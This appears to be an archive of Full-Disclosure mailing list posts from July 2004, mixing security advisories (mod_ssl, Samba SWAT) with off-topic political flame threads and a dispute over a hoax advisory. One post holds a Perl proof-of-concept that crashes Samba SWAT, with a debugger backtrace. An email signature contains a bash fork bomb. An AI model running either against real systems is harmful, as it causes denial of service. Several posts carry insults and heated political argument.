Gentoo Linux Security Advisory   GLSA 200407-18
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: mod_ssl: Format string vulnerability
  Date: July 22, 2004
  Bugs: #57379
ID: 200407-18

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


A bug in mod_ssl may allow a remote attacker to execute arbitrary code
when Apache is configured to use mod_ssl and mod_proxy.

Background
==

mod_ssl provides Secure Sockets Layer encryption and authentication to
Apache 1.3.

Affected packages
=

---
 Package  /   Vulnerable   /Unaffected
---
  1  net-www/mod_ssl   <= 2.8.18 >= 2.8.19

Description
===

A bug in ssl_engine_ext.c makes mod_ssl vulnerable to a ssl_log()
related format string vulnerability in the mod_proxy hook functions.

Impact
==

Given the right server configuration, an attacker could execute code as
the user running Apache, usually "apache".

Workaround
==

A server should not be vulnerable if it is not using both mod_ssl and
mod_proxy. Otherwise there is no workaround other than to disable
mod_ssl.

Resolution
==

All mod_ssl users should upgrade to the latest version:

# emerge sync

# emerge -pv ">=net-www/mod_ssl-2.8.19"
# emerge ">=net-www/mod_ssl-2.8.19"

References
==

  [ 1 ] mod_ssl Announcement
http://marc.theaimsgroup.com/?l=apache-modssl&m=109001100906749&w=2

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-200407-18.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0


pgphd6tWIa4IA.pgp
Description: PGP signature

[Full-Disclosure] [OT] assembly

[Michael Kurz]

Hey,
can someone tell me the different between
1. lea 0x7(%esp,1), %eax
and
2. lea 0x8(%esp), %eax
I think there's no different.
Thanks
Michael
--
~#:(){ :|:&};:
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] dha script

[Brian Toovey]

Anyone have a simple script to mock a dha against port 25?  I am attempting to provide a demo of a DHA protection system.




Brian Toovey
Senior Security Analyst
igxglobal
389 Main Street Suite 206
Hackensack, NJ 07601
Ph: 201-498-0555x2225
[EMAIL PROTECTED]
PGP Key: http://www.igxglobal.com/pgp/index.html

Subscribe to the igxglobal Daily Security Briefing
http://www.igxglobal.com/dsb/register.html

igxglobal announces Daily Security Briefing newsletter
http://www.prweb.com/releases/2004/5/prweb123759.htm

igxglobal delivers integrated real-time security reporting
http://www.igxglobal.com/rrf.html



The electronic message that you have received and any attachments are
solely intended for the use of the addressee(s) and may contain
information that is confidential. If you receive this email in error,
please advise us by responding to [EMAIL PROTECTED] You are required to
delete the contents and destroy any copies immediately.
igxglobal is not liable for the views expressed in this electronic
message or for the consequences of any computer viruses that may be
unknowingly transmitted within this message. This electronic message is
also subject to standard copyright/ownership laws. It is not intended to
be reproduced, or re-transmitted without the consent of the originator.






<>

signature.asc
Description: This is a digitally signed message part

RE: [Full-Disclosure] OFF TOPIC: antisemitic troll

[Ron DuFresne]

[SNIP]

>
> Your comment that 'One man's opinion is hardly proof' seems a tad inane
> doesn't it? After all, the content of the site is *not* 'one man's
> opinion'. It is a collection of articles from mainstream media agencies,
> not one man's opinion. If you read the text you quoted, it says 'one
> man's effort', it says absolutely nothing about 'opinion'.
>


The choice of articles used on the site might actually be the basis of the
"One man's opinion" quote made in the prior post.  If the selected
articles are not equally balanced then indeed there is a single oppinion
being displayed.  But, certainly this is not an argument for this list.

I, like many others here have oppionins in this area, but, they do not
belong on this list.  So, if others wish to discuss these matters, let's
take it off list here, either to private e-mail or form a list
specifically for this kind of discussion and let those seeking security
information on OS/application/networking get back to their searches.

Thanks,


Ron DuFresne
~~
"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [OT] Middle East (was Re: [Full-Disclosure] IE)

[Ron DuFresne]

I'm going to hate having to filter via procmail some of these folks, some
have had real and interesting information relating to this list.  But, if
folks persist in trying to express an agenda of politics towards this list
that should not apply to it, so be it.  Please take this off list or
form/find a list for such debate, I might even chose to engage that list,
but, when we read this list we're not seeking political agendas and rants,
we're trying to keep up with the risks our networks and systems suffer.
So please find a different and more appropriate venue for this discussion.

Thanks,

Ron DuFresne
~~
"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Samba 3.x swat preauthentication buffer overflow

[Evgeny Demidov]

Name:  Samba 3.x swat preauthentication buffer 
overflow
Date:  22 Jule 2004
CVE candidate: CAN-2004-0600
Author:Evgeny Demidov

Description:
There exists a remote preauthentication buffer overflow in 
Samba 3.x swat administration service.
All version of Samba 3.0.2-3.0.4 are vulnerable to our 
knowledge.

Fix:
Samba 3.0.5 which fixes this problem is available: 
http://www.samba.org/samba/whatsnew/samba-3.0.5.html

History:
28 April 2004 - vulnerability has been discovered during 
Samba source code audit by Evgeny Demidov
29 April 2004 - vulnerability details has been made 
available to VulnDisco clients
14 Jule  2004 - vulnerability has been reported to Samba 
Team
22 Jule  2004 - public release of the advisory

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] OFF TOPIC: antisemitic troll

[Valdis . Kletnieks]

On Thu, 22 Jul 2004 11:11:00 +1000, Brad Griffin <[EMAIL PROTECTED]>  said:

> two recent examples. Here we have someone talking about 3000 year old
> history in 2004! What the  relevance does ancient history have to do
> with the systematic destruction of another culture/society today

Both sides of that conflict have a legitimate claim that the other side has
been trying to destroy them for millenia.  When both sides are engaged in
attempted "systematic destruction" of the other as retribution for the
millenia, it has a LOT of relevance.



pgpcWsu0arPsh.pgp
Description: PGP signature

Re: [Full-Disclosure] IE

[Barry Fitzgerald]

Stephen Taylor wrote:
Is this a moderated list or is this a venue for anti-semitic diatribes?
Please let me know because I want to drop out if the totally biased,
off-topic comments can't be controlled.
SteveTaylor
 

Being opposed to Israeli political policies is about as anti-semitic as
being opposed to United States policies is unamerican...
Which is to say that it's not...
But, there's a whole boatload of deluded self-interested people out
there who think that it is.
-Barry
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] "Fud, lies and libel" against (type any name here, I'll use mi2g)

[Robert Wayne]

Hi there,

I am a usual reader of all the major security lists and I laughed (in a way)
to the posting about "Wendy's order system"... I laughed because at first
glance I thought it was funny, but then I realised that what I was reading
was a "vulnerability" on a security list, so it wasn't clear to me what that
stupid joke was doing there. Ok, it's true.. full-disclosure is not
moderated, everybody can post, yeah yeah, blah blah blah, but still: It is
(meant to be) a security list. Am I wrong?.

Please note that this is not just about another silly off-topic: someone
deliberately posted a vulnerability, perfect in its structure,
with all the right fields in the right place, on more than one security
list. There is more than off-topic here.
Ok, the content was clearly an hoax but it denotes a problem that could be
much more dangerous...

Let me point out that, as claims the anonymous guy that posted the (two?)
articles, I'm not affiliated with mi2g.

I thought about not replying and wasting my time, but given the fact that
your stupid postings are going on, and some other people give you even
credit for that, I would like to say something as well. Hope you don't mind.
Hope the list doesn't mind. It is not something off-topic in my opinion,
because it is strictly related to the way the security information are
diffused so it is inherently about security.

Before I proceed with the security issues related to the original post about
"Wendy", I would like to explore some of the points you have made:

-

>Instead of laughing along with the obvious hoax, mi2g responded in typical
>fashion by releasing a "News Alert" in which they spread FUD, lie about...

I don't understand your point. I can laugh, you can laugh... but they are
defamed! Can you explain why they should laugh? I don't get it...

>Ransom demands?  Negative publicity?  Reputation damage accelerates?
>mi2g is saying that "trusted web sites and security portals" posting
>the original hoax have contacted mi2g, offering to not post it in return
>for up to one MILLION dollars.  Who are these black hearted criminals?

First: my impression is that they are not referring to the sites you are
talking about. I don't see anywhere in their message: "trusted web sites and
security portals posting the original hoax have contacted mi2g". Are you
making it up (lying) ?

Second: are you working for all the sites mi2g is referring to, that you are
so confident in excluding this possibility?

Who gives you the right to judge something you don't know anything about? It
appears to me that you've spent many (valuable?) of your hours discrediting
that company, as well as bothering us (at least me) with your statements.

Either you know something we don't or you'd better be silent. I can't tell
if what mi2g says is true or not, I don't work there... do you? If I don't
know something I tend not to speak publicly about it... at very least I
don't try to sell it as THE TRUTH!

>Because of this obvious advisory parody, the poor masses are going to
>have a hard time figuring out which advisories are legitimate?  I think
>mi2g assumes every security professional and administrator is as big
>a retard as themselves.

Again, I do not agree with you. The whole point of their statement it is not
about "Wendy"!

Here it seems that YOU have some problems in comprehending the bottom line
message (please note that I am not saying you are a retard):



"If you can so easily post a clear hoax and nobody - or very few of them -
bothers to check, who can stop you from publishing a "real" (note the
quotes!) vulnerability disclosure, more realistic than "Wendy's", attacking
your competitor A or a product B ? What if you start publishing ten of them,
and then hundreds? How this massive pollution of security lists and sites
will change the user perception of a company A or product B? Will you buy a
product from a company that has hundreds of so called vulnerabilities? I bet
you wouldn't, at least you'll think about it twice... It doesn't really
matter if they are real or not, they are listed everywhere, so the
perception of them makes them real.

If you have the power to disseminate a big number of lists (as well as very
important web sites like securityfocus.com, that mirror any list without
questioning the authenticity of the postings) with false vulnerabilities,
you can discredit and damage any company. Full stop".



You got it?

This is the message I understood from mi2g's reply and it makes perfect
sense to me. Between you and me,  it looks like you have already started
this process against mi2g... Lies, false allegations, unreal
vulnerabilities, all posted to public lists... You are working very hard...
Is there at least someone paying you for this job?

>One out of three correct, good job mi2g!  Again, check the archives.

I found also a posting on ISN that mi2g seems to have missed... Should I let
them know?!? Hint: Don't look 

RE: [Full-Disclosure] OFF TOPIC: antisemitic troll

[James . Cupps]

First of all this is off topic but I think that in this case I like it that
way. 

I like FD.

I like the fact that if you know what you are looking for you can preempt a
patch notification by days by watching this list.

I like being able to see emerging mindsets and strategies that I might have
to use or be prepared to defend against.

I like the snippets of usable code (rare though they are) that are often not
available elsewhere (you gotta like it if packetstorm and focus don't have
it).

I even like the occasional troll to break up the monotony (despite the fact
that many in my office think my humor is odd) 

How is that virus infection Billy? 

Uh oh fatal code snowcrash snip snip snip...

Ok back up. 

That said this discussion is becoming damaging. The fact is that both sides
are dogmatic. Neither will convince the other of the error of their ways.
Both have legitimate arguments. Both have facts to back their arguments and
both have lies to back their arguments. Both sides have perpetrated heinous
acts against the other and both have been victims of them. We aren't going
to solve them on this board. For that matter the only way that I think they
will ever be reduced is if the Palestinians manage to come up with their own
version of Gandhi or MLK. Otherwise they will both keep killing each other
for ever and blaming the other. 

So please stop this. It is only making people mad and not serving any good.

James Cupps
Information Security Officer


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] 
Sent: Thursday, July 22, 2004 10:22 AM
To: Brad Griffin
Cc: [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] OFF TOPIC: antisemitic troll


[SNIP]

>
> Your comment that 'One man's opinion is hardly proof' seems a tad inane
> doesn't it? After all, the content of the site is *not* 'one man's
> opinion'. It is a collection of articles from mainstream media agencies,
> not one man's opinion. If you read the text you quoted, it says 'one
> man's effort', it says absolutely nothing about 'opinion'.
>


The choice of articles used on the site might actually be the basis of the
"One man's opinion" quote made in the prior post.  If the selected
articles are not equally balanced then indeed there is a single oppinion
being displayed.  But, certainly this is not an argument for this list.

I, like many others here have oppionins in this area, but, they do not
belong on this list.  So, if others wish to discuss these matters, let's
take it off list here, either to private e-mail or form a list
specifically for this kind of discussion and let those seeking security
information on OS/application/networking get back to their searches.

Thanks,


Ron DuFresne
~~
"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
This message may contain information which is private, privileged or
confidential and is intended solely for the use of the individual or entity
named in the message. If you are not the intended recipient of this message,
please notify the sender thereof and destroy / delete the message. Neither
the sender nor Sappi Limited (including its subsidiaries and associated
companies) shall incur any liability resulting directly or indirectly from
accessing any of the attached files which may contain a virus or the like. 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Re: OFF TOPIC: antisemitic troll

[Jeremiah Cornelius]

On Thursday 22 July 2004 03:10, Feher Tamas wrote:
> Anti-semites should not use the Internet, because TCP and UDP are
> the protocols of the elders of zion

Wow!  I missed that in the RFC. :-)

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] "Fud, lies and libel" against (type any name here, I'll use mi2g)

[Siegfried]

heh? you're the one who is trying to defend mi2g, i think you're that writer
from uk(?), i don't know if you're their friend or whatever. I mean look..
http://www.mi2g.com/cgi/mi2g/media.php
they are stealing news and many things from some sites for years (everybody
knows which ones), and they're whining because someone posted a fake and
funny advisory about them? come on, there are every week! just by checking
the original email we know if it's real or not.. and if someone really wants
to
release a fake advisory (appearing real) to attack another vendor, i'm sure
that the other vendor or readers would point it out.. if you don't trust
unmoderated
security mailing lists, then read the moderated ones, or look at the
security sites
which are writing summaries or just putting the good advisories together.
Don't blame
fd if it's unmoderated i think there were already many threads about it.
I don't see why a security would pay  $250,000 to $1 million because
they're forwarding "unmoderated and automatic messages", if it's real
it is nonsense, or maybe it's a hoax, you guys @ mi2g like to write news
for journalists, not for security sites.. things like "macosx is the most
secure
OS" and sell the paper full of stolen datas for hundreds of dollars.
and the advisory posted on isn is still available, i'm sure they laughed on
it so they published it, they usually don't post advisories.
so what's next? mi2g SA - social engineering vuln in multiple mailing lists
??
who cares


> 
>Hi there,
>
>I am a usual reader of all the major security lists and I laughed (in a
way)
>to the posting about "Wendy's order system"... I laughed because at first
>glance I thought it was funny, but then I realised that what I was reading
>was a "vulnerability" on a security list, so it wasn't clear to me what
that
>stupid joke was doing there. Ok, it's true.. full-disclosure is not
>moderated, everybody can post, yeah yeah, blah blah blah, but still: It is
>(meant to be) a security list. Am I wrong?.

Please note that this is not just about another silly off-topic: someone
deliberately posted a vulnerability, perfect in its structure,
with all the right fields in the right place, on more than one security
list. There is more than off-topic here.
Ok, the content was clearly an hoax but it denotes a problem that could be
much more dangerous...

Let me point out that, as claims the anonymous guy that posted the (two?)
articles, I'm not affiliated with mi2g.

I thought about not replying and wasting my time, but given the fact that
your stupid postings are going on, and some other people give you even
credit for that, I would like to say something as well. Hope you don't mind.
Hope the list doesn't mind. It is not something off-topic in my opinion,
because it is strictly related to the way the security information are
diffused so it is inherently about security.

Before I proceed with the security issues related to the original post about
"Wendy", I would like to explore some of the points you have made:

-

>Instead of laughing along with the obvious hoax, mi2g responded in typical
>fashion by releasing a "News Alert" in which they spread FUD, lie about...

I don't understand your point. I can laugh, you can laugh... but they are
defamed! Can you explain why they should laugh? I don't get it...

>Ransom demands?  Negative publicity?  Reputation damage accelerates?
>mi2g is saying that "trusted web sites and security portals" posting
>the original hoax have contacted mi2g, offering to not post it in return
>for up to one MILLION dollars.  Who are these black hearted criminals?

First: my impression is that they are not referring to the sites you are
talking about. I don't see anywhere in their message: "trusted web sites and
security portals posting the original hoax have contacted mi2g". Are you
making it up (lying) ?

Second: are you working for all the sites mi2g is referring to, that you are
so confident in excluding this possibility?

Who gives you the right to judge something you don't know anything about? It
appears to me that you've spent many (valuable?) of your hours discrediting
that company, as well as bothering us (at least me) with your statements.

Either you know something we don't or you'd better be silent. I can't tell
if what mi2g says is true or not, I don't work there... do you? If I don't
know something I tend not to speak publicly about it... at very least I
don't try to sell it as THE TRUTH!

>Because of this obvious advisory parody, the poor masses are going to
>have a hard time figuring out which advisories are legitimate?  I think
>mi2g assumes every security professional and administrator is as big
>a retard as themselves.

Again, I do not agree with you. The whole point of their statement it is not
about "Wendy"!

Here it seems that YOU have some problems in comprehending the bottom line
message (please note that I am not saying you

[Full-Disclosure] Affordable Network Behavior Analysis alternatives

[Jeff Gillian]

Hi list,

Since it appears the SecurityFocus Sectools and IDS lists are dead, I
thought I'd repost this here.

I recently saw a posting on FocusIDS regarding the high cost of the
most commercial solutions. The one mentioned was the QRadar product
from Q1Labs. Don't get me wrong, we have a budget, we just don't have
a Fortune 500 budget. :)

My question is simple, are there any other commercial out-of-the-box
alternatives to QRadar? Something that isn't going to cost me >$40,000
to deploy?

Any input would be appreciated.

Regards,

Jeff G.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Affordable Network Behavior Analysis alternatives

[Steven Rakick]

Jeff,

You may want to take a look at the nSight behavior
analysis product from Intrusense
(http://www.intrusense.com). 

We were actually in a similar bind a while back and
came across their beta program. We've been using it
ever since and will be buying it as soon as their
release version comes out. 

It has both standalone and distributed installation
types and dead simple to install and configure.
Overall it has less functionality than QRadar but it
made up for that in cost. While we haven't
*officially* purchased it yet, we were quoted under
$10,000 for the distributed version with support for 3
collector agents.

Still too much? You may also want to take a look at
Snort and Ntop then.

Feel free to email me if you want more details.


Steve


---
Thu, 22 Jul 2004 13:33:15 -0400
Jeff Gillian  [EMAIL PROTECTED] wrote:

Hi list,

Since it appears the SecurityFocus Sectools and IDS
lists are dead, I
thought I'd repost this here.

I recently saw a posting on FocusIDS regarding the
high cost of the
most commercial solutions. The one mentioned was the
QRadar product
from Q1Labs. Don't get me wrong, we have a budget, we
just don't have
a Fortune 500 budget. :)

My question is simple, are there any other commercial
out-of-the-box
alternatives to QRadar? Something that isn't going to
cost me >$40,000
to deploy?

Any input would be appreciated.

Regards,

Jeff G.






__
Do you Yahoo!?
Yahoo! Mail - 50x more storage than other providers!
http://promotions.yahoo.com/new_mail

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] SWAT PreAuthorization PoC

[bugtraq]

Hi,

The following is a brief proof of concept exploit code for the vulnerability 
mentioned in "Evgeny Demidov" <[EMAIL PROTECTED]>'s advisory: Samba 3.x swat 
preauthentication buffer overflow

Running the perl script against a vulnerable SWAT server will cause:
Program received signal SIGSEGV, Segmentation fault.
[Switching to process 30853]
0x410957af in memcpy () from /lib/tls/libc.so.6
(gdb) bt
#0  0x410957af in memcpy () from /lib/tls/libc.so.6
#1  0xb340 in ?? ()
#2  0x0001 in ?? ()
#3  0x080e34e7 in ?? ()
#4  0xb5e5 in ?? ()
#5  0x082919a0 in ?? ()
#6  0x in ?? ()
#7  0x080e08f0 in ?? ()
#8  0x082919a0 in ?? ()
#9  0x in ?? ()
#10 0x080e7090 in ?? ()
#11 0x0c0b8fae in ?? ()
#12 0xb5e5 in ?? ()
#13 0x in ?? ()
#14 0xb5a8 in ?? ()
#15 0x0806c97d in ?? ()
#16 0xb5e5 in ?? ()
#17 0x0815fd76 in ?? ()
#18 0x0006 in ?? ()
#19 0x41150ebc in ?? () from /lib/tls/libc.so.6
#20 0x081c8480 in ?? ()
#21 0x4108ae2f in _IO_list_resetlock () from /lib/tls/libc.so.6
#22 0xb3b4 in ?? ()
#23 0x081c8480 in ?? ()
#24 0x081c887f in ?? ()
#25 0x in ?? ()
#26 0x in ?? ()
#27 0xb3b4 in ?? ()
#28 0xb4cc in ?? ()
#29 0x0400 in ?? ()
#30 0x4108dda4 in mallopt () from /lib/tls/libc.so.6
#31 0xb3b4 in ?? ()
#32 0x08162fd9 in ?? ()
#33 0x41151888 in __after_morecore_hook () from /lib/tls/libc.so.6
#34 0x4108e3c8 in mallopt () from /lib/tls/libc.so.6
#35 0x in ?? ()


Exploit:
#!/usr/bin/perl
# Samba 3.0.4 and prior's SWAT Authorization Buffer Overflow
# Created by Noam Rathaus of Beyond Security Ltd.
#

use IO::Socket;
use strict;

my $host = $ARGV[0];

my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, 
PeerPort => "901" );

unless ($remote) { die "cannot connect to http daemon on $host" }

print "connected\n";

$remote->autoflush(1);

my $http = "GET / HTTP/1.1\r
Host: $host:901\r
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040712 
Firefox/0.9.1\r
Accept: text/xml\r
Accept-Language: en-us,en;q=0.5\r
Accept-Encoding: gzip,deflate\r
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r
Keep-Alive: 300\r
Connection: keep-alive\r
Authorization: Basic =\r
\r
";

print "HTTP: [$http]\n";
print $remote $http;
sleep(1);
print "Sent\n";

while (<$remote>)
{
 print $_;
}
print "\n";

close $remote;

-- 
Thanks
Noam Rathaus
CTO
Beyond Security Ltd.

Join the SecuriTeam community on Orkut:
http://www.orkut.com/Community.aspx?cmm=1

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] OFF TOPIC: antisemitic troll

[shr3kst3r]

I believe this whole discussion is an attempt by the "evil" black hats
to confuse and misdirect the "good" white hats.  So, now that the
"good" white hats (confused and misdirected) are talking about all the
issues surrounding Israel, the "evil" black hats are hacking into the
"good" white hats' computers and downloading pr0n.

shr3k
-- 
"I don't care what everyone likes. Ogres are not like
cakes... You dunce, irritating, miniature beast of 
burden. Ogres are like onions. End of story. 
Bye bye. See ya later..." -- Shrek

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] multiple web browsers, multiple bugs - onUnload and location.href

[Peter Besenbruch]

Rudolf Polzer wrote:
...Try http://www.informatik.uni-frankfurt.de/~polzer/rbiclan/location
The page is SUPPOSED to prevent going to somewhere else by changing
the URL back in onUnload (even that is already a reason to disable
JavaScript).
The interesting part is: depending on browser, you see different bugs...
Mozilla, Netscape 7 or Firefox: almost works correctly. Except for two
small bugs: View source shows the source of Google or where you TRIED
to go to, while you SEE the unload-trap page. The other bug: when you
close the browser window, onUnload is executed TWICE (you see two
alert boxes, with the number increasing) and the new page is loaded,
but not displayed. But the view-source bug somehow looks suspicious.
Do other parts of Mozilla think it was another website too?
I ran Firefox 0.8 for Linux on KDE, and enabled all Javascript 
capabilities in my options for this test. I also run with the Tabbrowser 
Extensions set to open all clicked links in a new tab. I ran into what 
you described, with the exception that viewing the source of the 
original page and the links worked fine. The other links also opened 
properly in new tabs, with no alerts. One of the features of the 
Tabbrowser Extension that I appreciate is the ability to surf with 
Javascript disabled, but with the ability to activate it via a double 
click for those Web sites that need it.


Hawaiian Astronomical Society: http://www.hawastsoc.org
HAS Deepsky Atlas: http://www.hawastsoc.org/deepsky
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] OFF TOPIC: antisemitic troll

[Valdis . Kletnieks]

On Thu, 22 Jul 2004 12:46:00 EDT, [EMAIL PROTECTED] said:

> to solve them on this board. For that matter the only way that I think they
> will ever be reduced is if the Palestinians manage to come up with their own
> version of Gandhi or MLK.

I suspect *that* conflict will require *both* sides to have their own version
in the same generation.  Gandhi and MLK succeeded because in both cases, their
opponents realized that using a bulldozer to clear 25,000 protesters out was,
if not morally unjustifiable, at least such bad PR that it wasn't an option.
The solutions needed are different when both sides feel the bulldozer (and
more) is justified

Anyhow, enough on this... let's talk about on-topic lowlife scum:

http://www.cnn.com/2004/LAW/07/21/cyber.theft/index.html

:)



pgpWUwXSCMWtE.pgp
Description: PGP signature

Re: [Full-Disclosure] antisemtism, FD and bandwidth - why it's all a joke

[VX Dude]

--- Harlan Carvey <[EMAIL PROTECTED]> wrote:
> Raymond,
> 
> > It merely is the trade-off of total
> > freedom of speech, which this list tries to
> > maintain.
> 
> I agree with you on that.  One would hope that
> people
> would realize that with free speech (and other
> freedoms) comes responsibility...or at the very
> least,
> observe some modicum of courtesy.  However, that
> very
> little bit seems to be far too much to expect.  
> 

Its funny to hear about "responsibility" and
"courtesy" on full-disclosure.  Full-disclosure does
not owe its existance because of these terms, and
realistically it doesn't owe it to "free speech".  As
Marcus Random says  "the proponents of disclosure have
won (largely by virtue of the fact that nobody can
stop them)".

This list exists because no one can stop you guys from
you're irresponcible use of free speech.  The good
flip of the coin is that you guys can't stop us from
being just as irresponcible, hence you're going to
continue to get emails from hush.com and gobbles and
software source club, and who else wants to post.  I
didn't join just to add more noise to the signal
(thats just a fun benifit), but to grab the viruses
that come off this list (hence the name).  You guys
are so protective of your right to be irresponcible
that you guys are afriad of installing a virus scanner
on the mailing list server.

You have to love the ironicy that full-disclosure may
die for the same reasons it was born.  You also have
to love the ironicy that Israel and Palistin have more
anti-semiticism than anywhere in the world, because
they're both semites and they hate each other.

Ahhh... the world is a fun place to live.  A shame you
guys take it too seriously.

__
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] [OT] redirection exploit in FD

[John Dowling]

This is no hoax! 

I hate hoax warnings, but this one is important.  

If a man comes to your front door and says he is
conducting a survey and 
asks you to show him your ass, DO NOT show him your
ass.  This is a scam; he 
only wants to see your ass. 

I wish I'd gotten this yesterday.  I feel so stupid
and cheap.

*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~

Okay, all kidding aside.  

I feel very secure knowing that one of the world's
foremost security admin mailing lists is currently
filled with OT chatter, and 'hey shut up!' posts. 
This indicates to me that there are currently no major
issue s to address other than who had more toys as a
child. fantastic.

Is this REALLY a security mailing list? 

A few suggestions to those persons who are inclined to
 discuss things other than security:
1) get a puppy
2) start a 'blog'
3) join a 12-step group
4) consult a professional
5) hunt for vulnerabilities in pron sites
-OR-
6) Find the appropriate venue to voice your opinions
and do so.  For example, if your topic is 'politics'
you could visit 'Google Groups'
(http://groups.google.com) and search for the word
'politics'.  Oh, and then press 'Search'.

'nuff said.



__
Do you Yahoo!?
New and Improved Yahoo! Mail - Send 10MB messages!
http://promotions.yahoo.com/new_mail 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [OT] Middle East (was Re: [Full-Disclosure] IE)

[Billy B. Bilano]

Hey dudes!
I have to chime in on this one because it's a topic I have personal 
experience with! At the bank I work at we have a lot of employees of all 
colors and creeds. We are an equal opportunity exploiter (LOL)! We view 
ourselves as bank employees and not people. It's sort of silly but we do 
it anyway!

So anyway, there was this Jewish guy and this Arab chap that worked 
together here in the IT department. They would go to lunch together a 
lot and would joke about stuff. They were real chummy about things and I 
was even invited to the Arab guy's BBQ picnic (he had a cool pool for me 
to wade in and I almost drowned because I can't swim). The fact that a 
Jew and an Arab were friends... I think there is a lesson to be learned 
there, guys! But, then again, they were both really dumb and they called 
soccer "football", so I think it goes without saying that they were both 
morons.

I let them go after the port 443 virus (which was discovered by me) 
attacked so I would not have to put up with their crap anymore.

P.S. Check my bloglog! http://www.bilano.biz/ because there's another 
good story about race relations in a bank and because it's cool! LOL!

P.P.S. Where is my Orkut invite!??! Come on, dudes!
--
Mr. Billy B. Bilano, MSCE, CCNA

Expert Sysadmin Since 2003!
'C:\WINDOWS, C:\WINDOWS\GO, C:\PC\CRAWL'  -- RMS
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] Affordable Network Behavior Analysis alternatives

[jason.heschel]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

We're using nSight Behavior Console right now. It's working very well.
Not sure what else is out there.  Maybe Snort?

JH

> Jeff Gillian  [EMAIL PROTECTED] wrote:
>
> Hi list,
>
> Since it appears the SecurityFocus Sectools and IDS
> lists are dead, I
> thought I'd repost this here.
>
> I recently saw a posting on FocusIDS regarding the
> high cost of the
> most commercial solutions. The one mentioned was the
> QRadar product
> from Q1Labs. Don't get me wrong, we have a budget, we
> just don't have
> a Fortune 500 budget. :)
>
> My question is simple, are there any other commercial
> out-of-the-box
> alternatives to QRadar? Something that isn't going to
> cost me >$40,000
> to deploy?
>
> Any input would be appreciated.
>
> Regards,
>
> Jeff G.
-BEGIN PGP SIGNATURE-
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4

wkYEARECAAYFAkEAG7cACgkQOWP3v1q5hd8A2ACfbPIEhu3jfXD0u4WUE50LqQj754sA
oIsMQW4cjIf5XfBRjbR6HLHzycPO
=5tgJ
-END PGP SIGNATURE-




Concerned about your privacy? Follow this link to get
secure FREE email: http://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
http://www.hushmail.com/services-messenger?l=434

Promote security and make money with the Hushmail Affiliate Program: 
http://www.hushmail.com/about-affiliate?l=427

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Vulnerability in sourceforge.net

[Gregory A. Gilliss]

Really...FreeBSD comes with user nobody set to /sbin/nologin out of the
box. Maybe they should have chosen a better host OS?

G

On or about 2004.07.22 07:49:53 +, Todd Towles ([EMAIL PROTECTED]) said:

> Sounds like they should have configured that page a bit different...made it
> run under a little less access...or said I say..it is a mis-configuration.
> =)

-- 
